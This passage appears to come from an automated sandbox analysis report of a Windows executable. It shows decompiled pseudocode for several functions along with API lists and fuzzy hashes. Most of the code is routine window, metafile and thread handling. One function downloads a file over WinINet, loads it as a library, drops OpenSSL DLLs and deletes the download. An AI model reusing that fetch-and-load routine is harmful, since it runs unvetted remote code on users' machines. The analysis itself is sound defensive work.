						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E00441704(_t116);
					goto L19;
				}
				_t117 = E00437E5C(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E00441704(_t117);
					goto L6;
				}
			}































                                                                                                                                                                                                                            0x004388f0
                                                                                                                                                                                                                            0x004388f9
                                                                                                                                                                                                                            0x004388fb
                                                                                                                                                                                                                            0x0043890a
                                                                                                                                                                                                                            0x0043890c
                                                                                                                                                                                                                            0x00438912
                                                                                                                                                                                                                            0x00438917
                                                                                                                                                                                                                            0x00438922
                                                                                                                                                                                                                            0x0043894b
                                                                                                                                                                                                                            0x0043894f
                                                                                                                                                                                                                            0x00438a7e
                                                                                                                                                                                                                            0x00438a87
                                                                                                                                                                                                                            0x00438a87
                                                                                                                                                                                                                            0x00438955
                                                                                                                                                                                                                            0x0043895b
                                                                                                                                                                                                                            0x0043895b
                                                                                                                                                                                                                            0x00438960
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438959
                                                                                                                                                                                                                            0x00438959
                                                                                                                                                                                                                            0x00438969
                                                                                                                                                                                                                            0x0043896b
                                                                                                                                                                                                                            0x00438971
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043897a
                                                                                                                                                                                                                            0x0043897d
                                                                                                                                                                                                                            0x00438982
                                                                                                                                                                                                                            0x004389a3
                                                                                                                                                                                                                            0x004389a6
                                                                                                                                                                                                                            0x004389b1
                                                                                                                                                                                                                            0x004389b3
                                                                                                                                                                                                                            0x004389c5
                                                                                                                                                                                                                            0x004389c7
                                                                                                                                                                                                                            0x004389b5
                                                                                                                                                                                                                            0x004389b8
                                                                                                                                                                                                                            0x004389c0
                                                                                                                                                                                                                            0x004389c0
                                                                                                                                                                                                                            0x004389ca
                                                                                                                                                                                                                            0x004389ca
                                                                                                                                                                                                                            0x004389ce
                                                                                                                                                                                                                            0x004389d4
                                                                                                                                                                                                                            0x004389da
                                                                                                                                                                                                                            0x004389e0
                                                                                                                                                                                                                            0x004389e1
                                                                                                                                                                                                                            0x004389eb
                                                                                                                                                                                                                            0x004389ec
                                                                                                                                                                                                                            0x004389f1
                                                                                                                                                                                                                            0x004389f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a03
                                                                                                                                                                                                                            0x00438a0e
                                                                                                                                                                                                                            0x00438a13
                                                                                                                                                                                                                            0x00438a23
                                                                                                                                                                                                                            0x00438a28
                                                                                                                                                                                                                            0x00438a2d
                                                                                                                                                                                                                            0x00438a3a
                                                                                                                                                                                                                            0x00438a65
                                                                                                                                                                                                                            0x00438a78
                                                                                                                                                                                                                            0x00438a7a
                                                                                                                                                                                                                            0x00438a7a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a78
                                                                                                                                                                                                                            0x00438a3c
                                                                                                                                                                                                                            0x00438a4b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a4d
                                                                                                                                                                                                                            0x00438a63
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a63
                                                                                                                                                                                                                            0x00438987
                                                                                                                                                                                                                            0x0043898d
                                                                                                                                                                                                                            0x0043898d
                                                                                                                                                                                                                            0x00438992
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043898b
                                                                                                                                                                                                                            0x0043898b
                                                                                                                                                                                                                            0x0043899b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043899b
                                                                                                                                                                                                                            0x0043892c
                                                                                                                                                                                                                            0x00438930
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438936
                                                                                                                                                                                                                            0x0043893a
                                                                                                                                                                                                                            0x0043893a
                                                                                                                                                                                                                            0x0043893f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438938
                                                                                                                                                                                                                            0x00438938
                                                                                                                                                                                                                            0x00438948
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438948

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                                                                                                                                                                                              • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                                                                                                                                                                                            • 73C9AC10.USER32(00000000,00438884,?,00000000,00000004,?,-0000000C,?), ref: 004389EC
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00438A03
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 00438A71
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                                                                                                                                                                                            • String ID: `C$tC
                                                                                                                                                                                                                            • API String ID: 2049660638-2788972245
                                                                                                                                                                                                                            • Opcode ID: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                                                                                                                                                                                            • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb7b7183224f25ed9cd336059e391895cb8aedaaf37bee30aa456c4423d9d4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A8A4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 0045A8B7
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0045A911
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0045A98A
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Active$MessageRect
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 3147912190-3887548279
                                                                                                                                                                                                                            • Opcode ID: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                                                                                                                                                                                            • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cef1ea23398dab616a7e991724775971796e361134f7c3a3b04aaf4b6622f78
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00428300 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042819C(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
					E00425F58();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040275C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00425F58();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00425F58();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x428476);
				return E0040277C(_v16);
			}


























                                                                                                                                                                                                                            0x00428301
                                                                                                                                                                                                                            0x00428303
                                                                                                                                                                                                                            0x0042830c
                                                                                                                                                                                                                            0x0042830f
                                                                                                                                                                                                                            0x00428312
                                                                                                                                                                                                                            0x00428316
                                                                                                                                                                                                                            0x00428328
                                                                                                                                                                                                                            0x00428332
                                                                                                                                                                                                                            0x00428342
                                                                                                                                                                                                                            0x00428342
                                                                                                                                                                                                                            0x00428347
                                                                                                                                                                                                                            0x00428353
                                                                                                                                                                                                                            0x00428356
                                                                                                                                                                                                                            0x00428364
                                                                                                                                                                                                                            0x00428372
                                                                                                                                                                                                                            0x0042837c
                                                                                                                                                                                                                            0x00428385
                                                                                                                                                                                                                            0x00428387
                                                                                                                                                                                                                            0x00428387
                                                                                                                                                                                                                            0x004283a7
                                                                                                                                                                                                                            0x004283c4
                                                                                                                                                                                                                            0x004283c7
                                                                                                                                                                                                                            0x004283d0
                                                                                                                                                                                                                            0x004283d5
                                                                                                                                                                                                                            0x004283da
                                                                                                                                                                                                                            0x004283f0
                                                                                                                                                                                                                            0x004283f2
                                                                                                                                                                                                                            0x004283f7
                                                                                                                                                                                                                            0x004283f9
                                                                                                                                                                                                                            0x004283f9
                                                                                                                                                                                                                            0x0042840b
                                                                                                                                                                                                                            0x00428410
                                                                                                                                                                                                                            0x0042841a
                                                                                                                                                                                                                            0x00428420
                                                                                                                                                                                                                            0x00428425
                                                                                                                                                                                                                            0x0042842c
                                                                                                                                                                                                                            0x00428444
                                                                                                                                                                                                                            0x00428446
                                                                                                                                                                                                                            0x0042844b
                                                                                                                                                                                                                            0x0042844d
                                                                                                                                                                                                                            0x0042844d
                                                                                                                                                                                                                            0x00428452
                                                                                                                                                                                                                            0x00428458
                                                                                                                                                                                                                            0x0042845b
                                                                                                                                                                                                                            0x0042845e
                                                                                                                                                                                                                            0x0042846e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                                                                                                                                                                                            • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                                                                                                                                                                                            • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMeta$Bits$DeleteHeader
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 1990453761-2679148245
                                                                                                                                                                                                                            • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00495084 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E00495084(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t55;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t79;
				struct HINSTANCE__* _t82;
				void* _t84;
				intOrPtr _t87;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(_t87);
				_push(0x4951d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				_t84 = 3;
				_t55 = 0x49f0f4;
				do {
					if( *_t55 == 0) {
						goto L5;
					} else {
						_t68 =  *0x49f100; // 0x0
						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
							_v5 = 0;
							goto L5;
						} else {
							_v5 = 1;
							_t72 =  *0x49f100; // 0x0
							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
							_t82 = LoadLibraryA(E00404E80(_v16));
							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
							_t74 =  *0x49f100; // 0x0
							E00404CCC( &_v20, "\\libeay32.dll", _t74);
							E0041DD9C(_t30, _t56, _v20, _t82);
							E00403BEC(_t56);
							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
							_t77 =  *0x49f100; // 0x0
							E00404CCC( &_v24, "\\ssleay32.dll", _t77);
							E0041DD9C(_t38, _t57, _v24, _t82);
							E00403BEC(_t57);
							FreeLibrary(_t82);
							_t79 =  *0x49f100; // 0x0
							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
							E00404BB8( &_v28, E00404E80(_v32));
							E00409BAC(_v28);
						}
					}
					break;
					L5:
					_t55 = _t55 + 4;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(0x4951db);
				return E004049E4( &_v32, 6);
			}




















                                                                                                                                                                                                                            0x00495089
                                                                                                                                                                                                                            0x0049508a
                                                                                                                                                                                                                            0x0049508b
                                                                                                                                                                                                                            0x0049508c
                                                                                                                                                                                                                            0x0049508d
                                                                                                                                                                                                                            0x0049508e
                                                                                                                                                                                                                            0x0049508f
                                                                                                                                                                                                                            0x00495090
                                                                                                                                                                                                                            0x00495091
                                                                                                                                                                                                                            0x00495095
                                                                                                                                                                                                                            0x00495096
                                                                                                                                                                                                                            0x0049509b
                                                                                                                                                                                                                            0x0049509e
                                                                                                                                                                                                                            0x004950a1
                                                                                                                                                                                                                            0x004950a6
                                                                                                                                                                                                                            0x004950ab
                                                                                                                                                                                                                            0x004950ae
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004950b4
                                                                                                                                                                                                                            0x004950bc
                                                                                                                                                                                                                            0x004950c2
                                                                                                                                                                                                                            0x004950d3
                                                                                                                                                                                                                            0x004951ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004950d9
                                                                                                                                                                                                                            0x004950d9
                                                                                                                                                                                                                            0x004950e5
                                                                                                                                                                                                                            0x004950eb
                                                                                                                                                                                                                            0x004950fe
                                                                                                                                                                                                                            0x00495115
                                                                                                                                                                                                                            0x0049511f
                                                                                                                                                                                                                            0x00495125
                                                                                                                                                                                                                            0x0049512f
                                                                                                                                                                                                                            0x00495136
                                                                                                                                                                                                                            0x00495150
                                                                                                                                                                                                                            0x0049515a
                                                                                                                                                                                                                            0x00495160
                                                                                                                                                                                                                            0x0049516a
                                                                                                                                                                                                                            0x00495171
                                                                                                                                                                                                                            0x00495177
                                                                                                                                                                                                                            0x00495184
                                                                                                                                                                                                                            0x0049518a
                                                                                                                                                                                                                            0x0049519c
                                                                                                                                                                                                                            0x004951a4
                                                                                                                                                                                                                            0x004951a4
                                                                                                                                                                                                                            0x004950d3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004951af
                                                                                                                                                                                                                            0x004951af
                                                                                                                                                                                                                            0x004951b2
                                                                                                                                                                                                                            0x004951b2
                                                                                                                                                                                                                            0x004951bb
                                                                                                                                                                                                                            0x004951be
                                                                                                                                                                                                                            0x004951c1
                                                                                                                                                                                                                            0x004951d3

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                                                                                                                                                                                              • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004950F9
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                                                                                                                                                                                              • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,0049C9B0,00475D16,00000000,00475D3C), ref: 00409BB7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                                                                                                                                                                                            • String ID: LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 1893608559-2695981766
                                                                                                                                                                                                                            • Opcode ID: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                                                                                                                                                                                            • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00421900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73synchronizationthreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                                                            			E00421900(char __edx) {
				char _v8;
				void* _v12;
				char _v16;
				void* __ebp;
				long _t11;
				long _t16;
				void* _t29;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t45;

				_t42 = _t44;
				_t45 = _t44 + 0xfffffff4;
				_v8 = __edx;
				_t11 = GetCurrentThreadId();
				_t36 =  *0x49de40; // 0x49e034
				if(_t11 !=  *_t36) {
					_v12 = CreateEventA(0, 0xffffffff, 0, 0);
					_push(_t42);
					_push(0x421a22);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					_push(0x49e86c);
					L00406FE0();
					_push(_t42);
					_push(0x421a04);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					if(E0049B5C4 == 0) {
						E0049B5C4 = E00403BBC(1);
					}
					_v16 = _v8;
					_t16 = E0049B5C4; // 0x0
					E0041AB10(_t16,  &_v16);
					E00421494();
					if( *0x49b532 != 0) {
						 *0x49b530();
					}
					_push(0x49e86c);
					L004071A0();
					_push(_t42);
					_push(0x4219e5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					WaitForSingleObject(_v12, 0xffffffff);
					_pop(_t38);
					 *[fs:eax] = _t38;
					_push(0x4219ec);
					_push(0x49e86c);
					L00406FE0();
					return 0;
				} else {
					_t29 =  *((intOrPtr*)(_v8 + 8))();
					return _t29;
				}
			}















                                                                                                                                                                                                                            0x00421901
                                                                                                                                                                                                                            0x00421903
                                                                                                                                                                                                                            0x00421907
                                                                                                                                                                                                                            0x0042190a
                                                                                                                                                                                                                            0x0042190f
                                                                                                                                                                                                                            0x00421917
                                                                                                                                                                                                                            0x00421934
                                                                                                                                                                                                                            0x00421939
                                                                                                                                                                                                                            0x0042193a
                                                                                                                                                                                                                            0x0042193f
                                                                                                                                                                                                                            0x00421942
                                                                                                                                                                                                                            0x00421945
                                                                                                                                                                                                                            0x0042194a
                                                                                                                                                                                                                            0x00421951
                                                                                                                                                                                                                            0x00421952
                                                                                                                                                                                                                            0x00421957
                                                                                                                                                                                                                            0x0042195a
                                                                                                                                                                                                                            0x00421964
                                                                                                                                                                                                                            0x00421972
                                                                                                                                                                                                                            0x00421972
                                                                                                                                                                                                                            0x0042197a
                                                                                                                                                                                                                            0x00421980
                                                                                                                                                                                                                            0x00421985
                                                                                                                                                                                                                            0x0042198a
                                                                                                                                                                                                                            0x00421997
                                                                                                                                                                                                                            0x004219a4
                                                                                                                                                                                                                            0x004219a4
                                                                                                                                                                                                                            0x004219aa
                                                                                                                                                                                                                            0x004219af
                                                                                                                                                                                                                            0x004219b6
                                                                                                                                                                                                                            0x004219b7
                                                                                                                                                                                                                            0x004219bc
                                                                                                                                                                                                                            0x004219bf
                                                                                                                                                                                                                            0x004219c8
                                                                                                                                                                                                                            0x004219cf
                                                                                                                                                                                                                            0x004219d2
                                                                                                                                                                                                                            0x004219d5
                                                                                                                                                                                                                            0x004219da
                                                                                                                                                                                                                            0x004219df
                                                                                                                                                                                                                            0x004219e4
                                                                                                                                                                                                                            0x00421919
                                                                                                                                                                                                                            0x0042191f
                                                                                                                                                                                                                            0x00421a3e
                                                                                                                                                                                                                            0x00421a3e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0042190A
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0042192F
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 0042194A
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219AF
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000), ref: 004219C8
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E86C,004219EC,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219DF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
